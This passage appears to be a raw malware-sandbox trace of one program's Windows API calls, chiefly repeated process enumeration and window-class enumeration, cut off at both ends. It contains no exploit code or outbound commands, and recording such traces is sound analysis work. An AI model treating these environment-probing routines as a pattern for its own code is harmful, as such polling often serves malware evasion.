pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0072.017] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0072.017] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.017] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0072.018] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0072.018] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0072.019] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0072.019] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0072.020] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0072.020] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0072.021] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0072.021] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0072.021] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0072.022] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0072.022] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0072.023] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0072.023] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0072.023] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0072.024] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0072.024] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0072.025] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0072.025] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0072.025] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0072.026] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0072.026] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0072.027] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0072.027] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0072.028] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.028] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0072.028] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.029] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0072.029] CloseHandle (hObject=0xaac) returned 1 [0072.029] Sleep (dwMilliseconds=0x64) [0072.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaac [0072.131] Process32First (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.132] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0072.132] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0072.133] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.133] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0072.133] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.134] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0072.134] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0072.135] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0072.135] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0072.136] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.136] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.136] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.137] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.137] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.138] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0072.138] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.138] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.139] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0072.139] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0072.140] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0072.140] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0072.140] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.141] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0072.141] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0072.142] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0072.142] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0072.143] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0072.143] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0072.144] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0072.144] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0072.144] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0072.145] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0072.145] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0072.146] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0072.146] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0072.146] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0072.147] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0072.147] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0072.148] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0072.148] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0072.149] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0072.149] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0072.149] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0072.150] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0072.150] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0072.151] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0072.151] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.151] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0072.152] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0077.806] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1254 [0077.811] Process32First (in: hSnapshot=0x1254, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 45 os_tid = 0xae8 [0071.630] EnumWindows (lpEnumFunc=0x4164058, lParam=0x2da0000) returned 1 [0071.631] GetClassNameA (in: hWnd=0x3013e, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0071.631] GetClassNameA (in: hWnd=0x300b2, lpClassName=0x974fb00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0071.631] GetClassNameA (in: hWnd=0x300ee, lpClassName=0x974fb00, 